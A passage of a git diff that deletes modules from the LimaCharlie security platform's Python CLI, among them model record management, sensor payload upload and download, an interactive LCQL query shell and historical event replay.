-        self.printOut( self.sensor.task( s, self.inv_id ) )
-
-if __name__ == "__main__":
-    import argparse
-    import getpass
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie.io cli' )
-    parser.add_argument( '-o', '--oid',
-                         type = lambda x: str( uuid.UUID( x ) ),
-                         required = False,
-                         dest = 'oid',
-                         help = 'the OID to authenticate as, if not specified global creds are used.' )
-    args = parser.parse_args()
-    if args.oid is not None:
-        secretApiKey = getpass.getpass( prompt = 'Enter secret API key: ' )
-    else:
-        secretApiKey = None
-
-    app = LCIOShell( args.oid, secretApiKey )
-    app.cmdloop()
diff --git a/limacharlie/Model.py b/limacharlie/Model.py
deleted file mode 100644
index 6ac5af64..00000000
--- a/limacharlie/Model.py
+++ /dev/null
@@ -1,303 +0,0 @@
-import urllib
-
-from limacharlie import Manager
-import yaml
-import sys
-import json
-
-from .utils import GET
-from .utils import POST
-from .utils import DELETE
-
-from tabulate import tabulate
-
-# Detect if this is Python 2 or 3
-import sys
-
-_IS_PYTHON_2 = False
-if sys.version_info[0] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib import quote as urlescape
-else:
-    from urllib.parse import quote as urlescape
-
-
-def printData(data):
-    if isinstance(data, str):
-        print(data)
-    else:
-        print(json.dumps(data, indent=2))
-
-
-def reportError(msg):
-    sys.stderr.write(msg + '\n')
-    sys.exit(1)
-
-
-class Model(object):
-    def __init__(self, man, modelName):
-        self._modelName = modelName
-        self._man = man
-
-    def mget(self, index_key_name, index_key_value):
-        return self._man._apiCall('models/%s/model/%s/records' % (self._man._oid, urlescape(self._modelName, safe = '')), GET, queryParams={
-            'model_name': self._modelName,
-            'index_key_name': index_key_name,
-            'index_key_value': index_key_value,
-        })
-
-    def get(self, primary_key):
-        return self._man._apiCall('models/%s/model/%s/record' % (self._man._oid, urlescape(self._modelName, safe = ''),), GET, queryParams={
-            'primary_key': primary_key,
-        })
-
-    def delete(self, primary_key):
-        return self._man._apiCall('models/%s/model/%s/record' % (self._man._oid, urlescape(self._modelName, safe = ''),), DELETE,
-                                  queryParams={
-                                      'primary_key': primary_key,
-                                  })
-
-    def query(self, start_model_name, start_index_key_name, start_index_key_value, plan=[]):
-        # Create the plan parameter list without URL encoding
-        plan_params = [('plan', json.dumps(item)) for item in plan]
-
-        # Create the base query parameters
-        query_params = {
-            'starting_model_name': start_model_name,
-            'starting_key_name': start_index_key_name,
-            'starting_key_value': start_index_key_value,
-        }
-
-        # Combine base query parameters and plan parameters
-        combined_query_params = list(query_params.items()) + plan_params
-
-        return self._man._apiCall('models/%s/query' % self._man._oid, GET, queryParams=combined_query_params)
-
-    def add(self, primary_key, fields={}, expiry=None):
-        params = {
-            'model_name': self._modelName,
-            'primary_key': primary_key,
-            'fields': json.dumps(fields),
-        }
-        if expiry is not None:
-            params['expiry'] = expiry
-
-        return self._man._apiCall('models/%s/model/%s/record' % (self._man._oid, urlescape(self._modelName, safe = '')), POST,
-                                  queryParams=params)
-
-    def list(self, limit=100, show_expiry=False, cursor=""):
-        return self._man._apiCall('models/%s/model/%s/records' % (self._man._oid, urlescape(self._modelName, safe = '')), POST, queryParams={
-            'model_name': self._modelName,
-            'limit': limit,
-            'cursor': cursor,
-            'show_expiry': 'true' if show_expiry else 'false',
-        })
-
-# _do_get Ex command line call: limacharlie model get model-name -pk xyz1234
-def _do_get(args, man):
-    if args.model_name is None:
-        reportError('Model name required')
-
-    if args.primary_key is not None:
-        printData(Model(man, args.model_name).get(args.primary_key))
-        return
-
-    printData(Model(man, args.model_name).mget(args.index_key_name, args.index_key_value))
-
-
-# _do_mget Ex: limacharlie model mget model-name -ikn host_name -ikv windows-server-2022-xyz
-# _do_mget with table view: limacharlie model mget ping_request -ikn sid -ikv 52b-cd86-46d4-a1a2 -t
-def _do_mget(args, man):
-    if args.model_name is None:
-        reportError('Model name required')
-
-    if args.index_key_name is None or args.index_key_value is None:
-        reportError('Index key name and value required')
-
-    data = Model(man, args.model_name).mget(args.index_key_name, args.index_key_value)
-
-    if args.table_view:
-        printTableView(data)
-    else:
-        printData(data)
-
-# _do_list Ex: limacharlie model list model-name
-# _do_list with table view: limacharlie model list ping_request -t
-def _do_list(args, man):
-    if args.model_name is None:
-        reportError('Model name required')
-
-    # The CLI limit is not the same as the API limit.
-    # If the CLI limit is set, we will just get that one page.
-    isAll = args.limit is None
-    limit = args.limit if args.limit is not None else 1000
-
-    cursor = ""
-    records = {}
-    while True:
-        data = Model(man, args.model_name).list(limit, True, cursor)
-        for k, v in data.get('records', {}).items():
-            records[k] = v
-        cursor = data.get('cursor', "")
-        if not cursor or not isAll:
-            break
-
-    if args.table_view:
-        printTableView(records)
-    else:
-        printData(records)
-
-# _do_add EX: limacharlie model add model-name -pk pk-value -d '{"type": "vm-linux-ubuntu", "location": "office-6"}' -e 1722020509
-def _do_add(args, man):
-    if args.model_name is None:
-        reportError('Model name required')
-
-    data = json.loads(args.data)
-
-    printData(Model(man, args.model_name).add(args.primary_key, fields=data, expiry=args.expiry))
-
-
-# _do_del EX: limacharlie model del model-name -pk test-1234
-def _do_del(args, man):
-    if args.model_name is None:
-        reportError('Model name required')
-
-    printData(Model(man, args.model_name).delete(args.primary_key))
-
-
-# EX-single hop: limacharlie model query user_event -ikn user_init -ikv user123 -p "yara_scan"
-# EX-set valid rels : limacharlie model query user_event -ikn user_init -ikv user123 -p "yara_scan:rel1,rel2" "sensors"
-# EX- table print out : limacharlie model query user_event -ikn user_init -ikv user123 -p "yara_scan" "sensors" -t
-def _do_query(args, man):
-    if args.model_name is None:
-        reportError('Model name required')
-
-    if args.index_key_name is None or args.index_key_value is None:
-        reportError('Index key name and value required')
-
-    plan = [planStringToDict(p) for p in args.plan] if args.plan else []
-
-    data = Model(man, args.model_name).query(args.model_name, args.index_key_name, args.index_key_value, plan)
-
-    if args.table_view:
-        printTableView(data)
-    else:
-        printData(data)
-
-
-def printTableView(data):
-    if isinstance(data, dict):  # Check if data is a dictionary of objects
-        if data:
-            first_key = next(iter(data))
-            headers = ["PK"] + list(data[first_key].keys())
-
-            # Prepare rows dynamically
-            rows = [[key] + list(value.values()) for key, value in data.items()]
-
-            print(tabulate(rows, headers=headers, tablefmt="grid"))
-        else:
-            print("No data found.")
-    else:
-        print("Data format is not a dictionary of objects.")
-
-
-def planStringToDict(plan):
-    if plan is None:
-        return None
-
-    ret = {}
-    components = plan.split(':')
-    if len(components) < 1 or len(components) > 2:
-        raise Exception(
-            'Invalid plan format ("target_model_name:relationship1,relationship2,..." or "target_model_name")'
-        )
-
-    # Required value
-    ret['target_model_name'] = components[0]
-
-    if len(components) == 2: # we have relatioship values
-        ret['only_relationships'] = components[1].split(',')
-
-    return ret
-
-
-def main(sourceArgs=None):
-    import argparse
-
-    actions = {
-        'get': _do_get,
-        'mget': _do_mget,
-        'list': _do_list,
-        'add': _do_add,
-        'del': _do_del,
-        'query': _do_query,
-    }
-
-    parser = argparse.ArgumentParser(prog='limacharlie model')
-    parser.add_argument('action',
-                        type=str,
-                        help='the action to take, one of: %s' % (', '.join(actions.keys(), )))
-
-    parser.add_argument('model_name',
-                        type=str,
-                        help='the model name')
-
-    parser.add_argument('-ikn', '--index-key-name',
-                        type=str,
-                        required=False,
-                        dest='index_key_name',
-                        default=None,
-                        help='the name of the index key')
-    parser.add_argument('-ikv', '--index-key-value',
-                        type=str,
-                        required=False,
-                        dest='index_key_value',
-                        default=None,
-                        help='the value of the index key')
-    parser.add_argument('-pk', '--primary-key',
-                        type=str,
-                        required=False,
-                        dest='primary_key',
-                        default=None,
-                        help='the primary key')
-    parser.add_argument('-p', '--plan',
-                        type=str,
-                        required=False,
-                        dest='plan',
-                        default=None,
-                        nargs='*',
-                        help='the query plan')
-    parser.add_argument('-d', '--data',
-                        type=str,
-                        required=False,
-                        dest='data',
-                        default=None,
-                        help='a JSON object to use as record data')
-    parser.add_argument('-e', '--expiry',
-                        type=int,
-                        required=False,
-                        dest='expiry',
-                        default=None,
-                        help='the expiry time as epoch (Unix timestamp)')
-    parser.add_argument('-l', '--limit',
-                        type=int,
-                        required=False,
-                        dest='limit',
-                        default=None,
-                        help='the limit')
-    parser.add_argument('-t', '--table-view',
-                        action='store_true',
-                        required=False,
-                        dest='table_view',
-                        help='display the data in a table view')
-
-    args = parser.parse_args(sourceArgs)
-
-    man = Manager(None, None)
-    actions[args.action.lower()](args, man)
-
-
-if '__main__' == __name__:
-    main()
diff --git a/limacharlie/Payloads.py b/limacharlie/Payloads.py
deleted file mode 100644
index 020c3968..00000000
--- a/limacharlie/Payloads.py
+++ /dev/null
@@ -1,91 +0,0 @@
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib2 import HTTPError
-    from urllib2 import Request as URLRequest
-    from urllib2 import urlopen
-    from urllib import urlencode
-else:
-    from urllib.error import HTTPError
-    from urllib.request import Request as URLRequest
-    from urllib.request import urlopen
-    from urllib.parse import urlencode
-
-from .utils import GET
-from .utils import POST
-from .utils import DELETE
-from .utils import LcApiException
-
-class Payloads( object ):
-    '''Helper object to manage executable Payloads for sensors.'''
-
-    def __init__( self, manager ):
-        '''Create a Payload object.
-
-        Args:
-            manager (limacharlie.Manager): manager providing authentication.
-        '''
-
-        self._manager = manager
-
-    def list( self ):
-        '''List all available payloads.
-        '''
-        data = self._manager._apiCall( 'payload/%s' % ( self._manager._oid, ), GET, {} )
-        return data
-
-    def get( self, name ):
-        '''Get a specific payload content.
-
-        Args:
-            name (str): the name of the payload to get.
-        '''
-        data = self._manager._apiCall( 'payload/%s/%s' % ( self._manager._oid, name ), GET, {} )
-        getUrl = data.get( 'get_url', None )
-        if getUrl is None:
-            return None
-
-        request = URLRequest( getUrl )
-        request.get_method = lambda: "GET"
-        u = urlopen( request )
-
-        return u.read()
-
-    def create( self, name, payloadPath = None, payloadContent = None ):
-        '''Create a new payload.
-
-        Args:
-            name (str): the name of the payload to create.
-            payloadPath (str): path to the file containing the payload.
-            payloadContent (bytes): content of the new payload.
-        '''
-        if payloadPath is None and payloadContent is None:
-            raise LcApiException( 'no payload content or path specified' )
-        data = self._manager._apiCall( 'payload/%s/%s' % ( self._manager._oid, name ), POST, {} )
-        putUrl = data.get( 'put_url', None )
-        if putUrl is None:
-            return None
-
-        if payloadContent is None:
-            with open( payloadPath, 'rb' ) as f:
-                payloadContent = f.read()
-
-        request = URLRequest( str( putUrl ), headers = {
-            'Content-Type' : 'application/octet-stream'
-        } )
-        request.get_method = lambda: "PUT"
-        u = urlopen( request, data = payloadContent )
-
-        return u.read()
-
-    def delete( self, name ):
-        '''Delete a payload.
-
-        Args:
-            name (str): the name of the payload to delete.
-        '''
-        data = self._manager._apiCall( 'payload/%s/%s' % ( self._manager._oid, name ), DELETE, {} )
-        return data
\ No newline at end of file
diff --git a/limacharlie/Query.py b/limacharlie/Query.py
deleted file mode 100644
index 515267c0..00000000
--- a/limacharlie/Query.py
+++ /dev/null
@@ -1,506 +0,0 @@
-from functools import cache
-from functools import wraps
-from . import Manager
-from .Replay import Replay
-import cmd
-import atexit
-import sys
-import shutil
-import json
-from collections import OrderedDict
-try:
-    import pydoc
-except:
-    pydoc = None
-from tabulate import tabulate
-from termcolor import colored
-import os.path
-try:
-    import readline
-except ImportError:
-    readline = None
-
-from .utils import Spinner
-from .term_utils import prettyFormatDict
-from .term_utils import printFacets, printHistogram
-
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie query' )
-
-    parser.add_argument( '--query',
-                         type = str,
-                         required = False,
-                         dest = 'query',
-                         default = None,
-                         help = 'query to issue.' )
-
-    parser.add_argument( '--limit-event',
-                         type = int,
-                         required = False,
-                         dest = 'limitEvent',
-                         default = None,
-                         help = 'limits the number of events evaluated to approximately this number.' )
-
-    parser.add_argument( '--limit-eval',
-                         type = int,
-                         required = False,
-                         dest = 'limitEval',
-                         default = None,
-                         help = 'limits the number of rule evaluations to approximately this number.' )
-
-    parser.add_argument( '--dry-run',
-                         action = 'store_true',
-                         default = None,
-                         required = False,
-                         dest = 'isDryRun',
-                         help = 'if set, the request will be simulated and the maximum number of evaluations expected will be returned.' )
-
-    parser.add_argument( '--pretty',
-                         action = 'store_true',
-                         default = None,
-                         required = False,
-                         dest = 'isPretty',
-                         help = 'print json in pretty format (in single-query mode).' )
-
-    parser.add_argument( '--format',
-                         type = str,
-                         default = 'table',
-                         required = False,
-                         dest = 'format',
-                         help = 'print format for interactive mode.' )
-
-    parser.add_argument( '--out-file',
-                         type = str,
-                         default = None,
-                         required = False,
-                         dest = 'outFile',
-                         help = 'in interactive mode, output log to this file.' )
-
-    parser.add_argument( '--force-replay-url',
-                         default = None,
-                         required = False,
-                         dest = 'forceReplayUrl',
-                         help = 'force use a specific replay instance url' )
-
-    parser.add_argument( '--labs',
-                         action = 'store_true',
-                         default = None,
-                         required = False,
-                         dest = 'enableLabs',
-                         help = 'enable labs / experimental features.' )
-
-
-    args = parser.parse_args( sourceArgs )
-
-    replay = Replay( Manager() )
-
-    if not args.query:
-        LCQuery( replay, args.format, args.outFile ).cmdloop()
-        return
-
-    if args.forceReplayUrl:
-        print("Using Replay URL: %s" % ( args.forceReplayUrl, ) )
-
-    response = replay._doQuery( args.query,
-                                limitEvent = args.limitEvent,
-                                limitEval = args.limitEval,
-                                isDryRun = args.isDryRun,
-                                isCursorBased = False,
-                                includeStats = args.enableLabs,
-                                forceUrl = args.forceReplayUrl,
-                )
-
-    error = response.get( 'error', None )
-    if error:
-        print( "ERROR: %s" % ( error, ) )
-        return
-    if not response[ 'results' ]:
-        print( f"No results found matching query: {args.query}" )
-        return
-
-    histogram = response.get("histogram")
-    facets = response.get("facets")
-
-    if args.enableLabs and histogram:
-        printHistogram(histogram)
-        print("")
-
-    if args.enableLabs and facets:
-        printFacets(facets)
-
-    for result in response[ 'results' ]:
-        if args.isPretty:
-            print(prettyFormatDict(result[ 'data' ]))
-        else:
-            print( json.dumps( result[ 'data' ] ) )
-
-
-def requireIntValue(command_name: str):
-    """
-    Decorator which can be wrapped around do_set_xxx functions which require interger values.
-
-    It ensures the provided input is an integer, otherwise it logs an error.
-    """
-    def decorator(func):
-        @wraps(func)
-        def wrapper(self, inp, *args, **kwargs):
-            if inp is None:
-                print(f"Error: {command_name} requires an integer value.", file=sys.stderr)
-                return None
-            try:
-                inp = int(inp)
-            except ValueError:
-                print(f"Error: {command_name} requires an integer value.", file=sys.stderr)
-                return None
-            return func(self, inp, *args, **kwargs)
-        return wrapper
-    return decorator
-
-
-class LCQuery( cmd.Cmd ):
-    def __init__( self, replay, format, outFile ):
-        self.intro = 'This LimaCharlie feature is in Beta, LCQL is likely going to evolve!\nThe LimaCharlie Query allows you to query the dataset in a more free-form fashion based on the LC Query Language.'
-        self._timeFrame = "-10m"
-        self._sensors = "*"
-        self._events = "*"
-        self._stream = 'event'
-        self._limitEvent = 0
-        self._limitEval = 0
-        self._billed = 0
-        self._pricingBlock = 200000
-        self._histfile = os.path.expanduser( '~/.limacharlie_history' )
-        self._histfile_size = 1000
-        self._outFile = outFile
-        self._replay = replay
-        self._format = format
-        self._lastData = None
-        self._lastQuery = None
-        self._lastStats = None
-        self._lastRule = None
-        self._schema = set()
-        self._allEvents = []
-        self._q = None
-        readline.set_completer_delims( ' ' )
-        super(LCQuery, self).__init__()
-        self._getAllEvents()
-        self._populateSchema()
-        self._setPrompt()
-
-        # Ensure it's called even if user exist with CTRL+C and similar - as such, we use atexit
-        # handler instead of postloop which is only called on quit command.
-        atexit.register(self.saveHistory)
-
-    def preloop( self ):
-        if readline and os.path.exists( self._histfile ):
-            readline.read_history_file( self._histfile )
-
-    def saveHistory( self ):
-        """
-        Save interactive prompt history to a history file on disk.
-        """
-        if readline:
-            readline.set_history_length( self._histfile_size )
-            readline.write_history_file( self._histfile )
-            # Ensure secure permissions, there is a small race, but we can fix this later
-            os.chmod(self._histfile, 0o600)
-
-    def precmd( self, inp ):
-        self._logOutput( inp, isNoPrint = True )
-        return inp
-
-    def _logOutput( self, output, isNoPrint = False ):
-        if not isNoPrint:
-            print( output )
-        if not self._outFile:
-            return
-        with open( self._outFile, 'a' ) as f:
-            f.write( output )
-            f.write( "\n" )
-
-    def do_q( self, inp, isCursorBased = True ):
-        '''Query (paged).'''
-        thisQuery = "%s | %s | %s | %s" % ( self._timeFrame, self._sensors, self._events, inp )
-        cacheKey = "%s%s%s" % ( self._limitEval, self._limitEvent, thisQuery )
-
-        q = None
-        isFromCache = False
-
-        # Check if the is the same last query we did, if so, re-use the result.
-        if cacheKey == self._lastQuery:
-            self._logOutput( f"{len( self._lastData )} results from cache" )
-            toRender = self._lastData
-            isFromCache = True
-        else:
-            sys.stdout.write( colored("Query running ", 'cyan') )
-            if isCursorBased:
-                q = self._replay._doQuery( thisQuery,
-                                           limitEvent = self._limitEvent if self._limitEvent else None,
-                                           limitEval = self._limitEval if self._limitEval else None,
-                                           isCursorBased = isCursorBased,
-                                           stream = self._stream )
-                with Spinner():
-                    response = q.next()
-                    error = response.get( 'error', None )
-                    if error:
-                        self._logOutput( f"ERROR: {error}" )
-                        return
-            else:
-                with Spinner():
-                    response = self._replay._doQuery( thisQuery,
-                                                      limitEvent = self._limitEvent if self._limitEvent else None,
-                                                      limitEval = self._limitEval if self._limitEval else None,
-                                                      isCursorBased = isCursorBased,
-                                                      stream = self._stream )
-                    error = response.get( 'error', None )
-                    if error:
-                        self._logOutput( f"ERROR: {error}" )
-                        return
-
-            print( "" )
-            thisBilled = response.get( 'stats', {} ).get( 'n_billed', 0 )
-            self._lastStats = response.get( 'stats', {} )
-            self._lastRule = response.get( 'transcoded_rule', None )
-            self._billed += thisBilled
-            self._logOutput( f"Query cost: ${(thisBilled / self._pricingBlock) / 100}" )
-            self._logOutput( f"{len( response[ 'results' ] )} results" )
-
-            self._lastData = tuple( d[ 'data' ] for d in response[ 'results' ] )
-            self._lastQuery = cacheKey
-            toRender = self._lastData
-
-        if len( toRender ) != 0:
-            self._outputPage( toRender )
-
-        if q is not None and q.hasMore:
-            print( "...query has more pages, use 'n' to get the next page" )
-            self._q = q
-        elif not isFromCache:
-            self._q = None
-
-    def do_qa( self, inp ):
-        '''Query All (non-paged).'''
-        return self.do_q( inp, isCursorBased = False )
-    def complete_qa( self, text, line, begidx, endidx ):
-        return self.complete_q( text, line, begidx, endidx )
-
-    def complete_q( self, text, line, begidx, endidx ):
-        pathToComplete = line.split()[ -1 ]
-        results = []
-        for evt in self._schema:
-            if not evt.startswith( pathToComplete ):
-                continue
-            results.append( evt )
-        return results
-
-    def _outputPage( self, toRender ):
-        if self._format == 'json':
-            if pydoc is None:
-                self._logOutput( "\n".join( json.dumps( d, indent = 2 ) for d in toRender ) )
-            else:
-                dat = "\n".join( json.dumps( d, indent = 2 ) for d in toRender )
-                self._logOutput( dat, isNoPrint = True )
-                pydoc.pager( dat )
-        elif self._format == 'table':
-            if pydoc is None:
-                self._logOutput( self._renderTable( toRender ) )
-            else:
-                # Ensure ANSI escape codes are preserved by setting the pager appropriately.
-                if shutil.which('less') and not os.environ.get('PAGER'):
-                    os.environ['PAGER'] = 'less -R'
-                dat = self._renderTable( toRender )
-                self._logOutput( dat, isNoPrint = True )
-                pydoc.pager( dat )
-        else:
-            self._logOutput( 'unknown format' )
-
-    def _renderTable( self, elem ):
-        data = []
-
-        for event in elem:
-            # Ensure ts, routing, event ctable column ordering for events
-            is_event = "ts" in event and "routing" in event and "event" in event
-
-            item = OrderedDict()
-
-            if is_event:
-                item['ts'] = self._formatVal( event['ts'] )
-                item['routing'] = self._formatVal( event['routing'] )
-                item['event'] = self._formatVal( event['event'] )
-            else:
-                for key, value in event.items():
-                    item[key] = self._formatCol(value)
-            data.append(item)
-
-        return tabulate( data, headers = 'keys', tablefmt = 'grid', maxcolwidths=[None, None, None] )
-
-    def _formatCol( self, col ):
-        if isinstance( col, dict ):
-            return prettyFormatDict(col, indent = 2)
-        return col
-
-    def _formatVal ( self, val ):
-        if isinstance( val , dict ):
-            return prettyFormatDict( val )
-        return val
-
-    def do_n( self, inp ):
-        '''Fetch the Next page of results.'''
-        if self._q is None:
-            print( "no more pages in previous query" )
-            return
-        sys.stdout.write( colored("Query running ", 'cyan') )
-        q = self._q
-        with Spinner():
-            response = q.next()
-            error = response.get( 'error', None )
-            if error:
-                self._logOutput( f"ERROR: {error}" )
-                return
-
-        print( "" )
-        thisBilled = response.get( 'stats', {} ).get( 'n_billed', 0 )
-        self._lastStats = response.get( 'stats', {} )
-        self._billed += thisBilled
-        self._logOutput( f"Query cost: ${(thisBilled / self._pricingBlock) / 100}" )
-        self._logOutput( f"{len( response[ 'results' ] )} results" )
-
-        self._lastData = tuple( d[ 'data' ] for d in response[ 'results' ] )
-        toRender = self._lastData
-
-        if len( toRender ) != 0:
-            self._outputPage( toRender )
-
-        if q is not None and q.hasMore:
-            print( "...query has more pages, use 'next' to get the next page" )
-            self._q = q
-        else:
-            self._q = None
-
-    def do_dryrun( self, inp ):
-        '''Execute a command as a dry-run and get back aproximate cost of the query.'''
-        sys.stdout.write( colored("Query running ", 'cyan') )
-        with Spinner():
-            response = self._replay._doQuery( f"{self._timeFrame} | {self._sensors} | {self._events} | {inp}",
-                                            limitEvent = self._limitEvent if self._limitEvent else None,
-                                            limitEval = self._limitEval if self._limitEval else None,
-                                            isDryRun = True,
-                                            isCursorBased = False,
-                                            stream = self._stream )
-        thisBilled = response.get( 'stats', {} ).get( 'n_billed', 0 )
-        print( "Note that aproximate costs for queries with a time frame within the last 6h may be under-reported.")
-        self._logOutput( f"Aproximate cost: ${(thisBilled / self._pricingBlock) / 100}" )
-        self._logOutput( json.dumps( response, indent = 2 ) )
-
-    def complete_dryrun( self, text, line, begidx, endidx ):
-        return self.complete_q( text, line, begidx, endidx )
-
-    def do_stats( self, inp ):
-        '''Get statistics on the total cost incurred during this session.'''
-        self._logOutput( f"Session cost: ${(self._billed / self._pricingBlock) / 100}" )
-        self._logOutput( f"Last query stats: {json.dumps( self._lastStats, indent = 2 )}" )
-        self._logOutput( f"Last D&R rule generated: {json.dumps( self._lastRule, indent = 2 )}" )
-
-    def do_quit( self, inp ):
-        '''Quit the LCQL interface.'''
-        self.do_stats( None )
-        return True
-
-    def _setPrompt( self ):
-        limits = "Context: "
-        if self._limitEvent:
-            limits += f"limit_event: {self._limitEvent} "
-        if self._limitEval:
-            limits += f"limit eval: {self._limitEval} "
-        self.prompt = f"{limits}{colored(self._timeFrame, 'red')} | {colored(self._sensors, 'blue')} | {colored(self._events, 'green')} | \n> "
-
-    def do_exit( self, inp ):
-        '''Quit the LCQL interface.'''
-        self.do_stats( None )
-        return True
-
-    def emptyline(self):
-         pass
-
-    def do_set_format( self, inp ):
-        '''Set the display format to output, one of "json", "table"'''
-        self._format = inp
-
-    def do_set_time( self, inp ):
-        '''Set the time range to query, like "-1h" or "2022-01-16 to 2022-01-18"'''
-        self._timeFrame = inp
-        self._setPrompt()
-
-    def do_set_sensors( self, inp ):
-        '''Set the sensors to query like: "*", a list of SIDs, or a sensor selector like "plat == windows"'''
-        self._sensors = inp
-        self._setPrompt()
-
-    def do_set_events( self, inp ):
-        '''Set the event types to query, like "NEW_PROCESS DNS_REQUEST'''
-        self._events = inp
-
-        self._populateSchema()
-
-        self._setPrompt()
-
-    def do_set_stream( self, inp ):
-        '''Set the data stream to query, one of "event", "audit", "detect", defaults to "event"'''
-        self._stream = inp
-
-    def complete_set_events( self, text, line, begidx, endidx ):
-        return [ e for e in self._allEvents if e.startswith( text ) ]
-
-    def _getAllEvents( self ):
-        sys.stdout.write( colored("Fetching event list  ", 'cyan') )
-        with Spinner():
-            self._allEvents = [ e[4:] for e in self._replay._lc.getSchemas()[ 'event_types' ] if e.startswith( 'evt:' ) ]
-        print( "" )
-
-    def _populateSchema( self ):
-        sys.stdout.write( colored("Fetching autocomplete data  ", 'cyan') )
-        with Spinner():
-            toSearch = []
-            if self._events == '*':
-                # Query all evt:
-                toSearch = [ '' ]
-            else:
-                toSearch = [ e.strip() for e in self._events.split() ]
-
-            self._schema = set()
-            for evt in toSearch:
-                if evt == '':
-                    for s, v in self._replay._lc.getSchema( 'evt:' )[ 'schemas' ].items():
-                        self._schema.update( ( e[ 2 : ] for e in v ) )
-                else:
-                    self._schema.update( ( e[ 2 : ] for e in self._replay._lc.getSchema( f"evt:{evt}" )[ 'schema' ][ 'elements' ] ) )
-        print( "" )
-
-    @requireIntValue("set_limit_event")
-    def do_set_limit_event( self, inp ):
-        '''Set the aproximate maximum number of events processed per request, like "1000"'''
-        self._limitEvent = int(inp)
-        self._setPrompt()
-
-    @requireIntValue("set_limit_eval")
-    def do_set_limit_eval( self, inp ):
-        '''Set the aproximate maximum number of evaluations per request, like "20000"'''
-        self._limitEval = int(inp)
-        self._setPrompt()
-
-    def do_set_output( self, inp ):
-        '''Set an output file path where this session will be mirrored, like "~/limacharlie_session.txt"'''
-        self._outFile = inp
-
-    def do_env( self, inp ):
-        '''Display the current environment this session is executing in'''
-        self._logOutput( f"Current env: time={self._timeFrame} sensors={self._sensors} events={self._events} format={self._format} output={self._outFile}" )
-
-    def do_lcql( self, inp ):
-        '''See the official LCQL documentation here: https://doc.limacharlie.io/docs/documentation/b0915c7a5f598-lima-charlie-query-language'''
-        pass
-
-if '__main__' == __name__:
-    main()
diff --git a/limacharlie/Replay.py b/limacharlie/Replay.py
deleted file mode 100644
index 72dd23d6..00000000
--- a/limacharlie/Replay.py
+++ /dev/null
@@ -1,480 +0,0 @@
-from . import Manager
-from .utils import LcApiException
-from .utils import parallelExec
-
-import uuid
-import json
-import yaml
-import time
-import sys
-
-class queryContext( object ):
-    def __init__( self, replay, req, forceUrl = None ):
-        self._req = req
-        self._replay = replay
-        self._forceUrl = forceUrl
-        self.hasMore = True
-
-        if self._forceUrl:
-            self._altRoot = self._forceUrl
-        else:
-            self._altRoot = 'https://%s/' % ( self._replay._replayURL, )
-
-        if not self._altRoot.endswith( '/' ):
-            self._altRoot += '/'
-
-    def __iter__( self ):
-        # If the queryContext is used as an iterator, the returned data
-        # during iteration will be the per-row data, not including stats.
-        return ResultsIterator( self )
-
-    def next( self ):
-        # If the queryContext is not used as an iterator, the user can call
-        # next() to get one page at a time of results including stats.
-        if self._req[ 'event_source' ][ 'sensor_events' ][ 'cursor' ] is None:
-            return None
-
-        resp = self._replay._lc._apiCall( '',
-                                          'POST',
-                                          {},
-                                          altRoot = self._altRoot,
-                                          rawBody = json.dumps( self._req ).encode(),
-                                          contentType = 'application/json' )
-        cursor = resp.get( 'cursor', None )
-        if not cursor:
-            cursor = None
-        self._req[ 'event_source' ][ 'sensor_events' ][ 'cursor' ] = cursor
-        if cursor is None:
-            self.hasMore = False
-        return resp
-
-class ResultsIterator( object ):
-    '''Iterator that yields individual results from a queryContext.
-
-    This provides a Python 3 compatible iterator interface that yields
-    one result at a time from the API response, automatically fetching
-    the next page when needed.
-    '''
-
-    def __init__( self, queryContext ):
-        self._queryContext = queryContext
-        self._currentResults = []
-        self._currentIndex = 0
-        self._hasMore = True
-
-    def __iter__( self ):
-        return self
-
-    def __next__( self ):
-        # If we've exhausted the current results, fetch the next page
-        if self._currentIndex >= len( self._currentResults ):
-            if not self._hasMore:
-                raise StopIteration()
-
-            # Get next page of results
-            resp = self._queryContext.next()
-            if resp is None:
-                self._hasMore = False
-                raise StopIteration()
-
-            # Update our state
-            self._currentResults = resp.get( 'results', [] )
-            self._currentIndex = 0
-            self._hasMore = self._queryContext.hasMore
-
-            # If we still have no results, we're done
-            if not self._currentResults:
-                raise StopIteration()
-
-        # Return the next result and advance the index
-        result = self._currentResults[ self._currentIndex ]
-        self._currentIndex += 1
-        return result['data']
-
-class Replay( object ):
-    '''Interface to query historical sensor data in Insight with specific D&R rules.'''
-
-    def __init__( self, manager ):
-        '''Create a Replay manager object.
-
-        Args:
-            manager (limacharlie.Manager): manager providing authentication.
-            maxTimeWindow (int): number of seconds to split sensor data during analysis.
-            maxConcurrent (int): number of sensors windows to process in parallel.
-            isInteractive (bool): if True, display progress updates to standard out.
-        '''
-
-        self._lc = manager
-        self._replayURL = self._lc.getOrgURLs()[ 'replay' ]
-
-    def _doQuery( self, query, limitEvent = None, limitEval = None, isDryRun = False, isCursorBased = False, stream = 'event',
-                  includeStats = False, forceUrl = None, isValidation = False ):
-        if not query:
-            raise LcApiException( 'no query specified' )
-
-        req = {
-            'oid' : self._lc._oid,
-            'query' : query,
-            'limit_event' : 0 if limitEvent is None else limitEvent,
-            'limit_eval' : 0 if limitEval is None else limitEval,
-            'is_dry_run' : isDryRun,
-            'event_source' : {
-                'stream' : stream,
-                'sensor_events' : {
-                    'cursor' : '-' if isCursorBased else '',
-                },
-            },
-        }
-
-        if includeStats:
-            req[ 'include_histogram' ] = True
-            req[ 'include_facets' ] = True
-
-        if isValidation:
-            req[ 'is_validation' ] = True
-
-        if not isCursorBased:
-            return queryContext( self, req, forceUrl = forceUrl ).next()
-
-        return queryContext( self, req, forceUrl = forceUrl )
-
-    def _scanHistoricalSensor( self, sid = None, startTime = None, endTime = None, events = None, ruleName = None, namespace = None, ruleContent = None, isRunTrace = False, isStateful = None, limitEvent = None, limitEval = None, isDryRun = False, stream = 'event' ):
-        resp = None
-
-        if ruleName is None and ruleContent is None:
-            raise LcApiException( 'no rule specified' )
-
-        req = {
-            'oid' : self._lc._oid,
-            'rule_source' : {
-                'rule_name' : '' if ruleName is None else ruleName,
-                'namespace' : '' if namespace is None else namespace,
-                'rule' : ruleContent,
-            },
-            'event_source' : {
-                'stream' : stream,
-                'sensor_events' : {
-                    'sid' : '' if sid is None else sid,
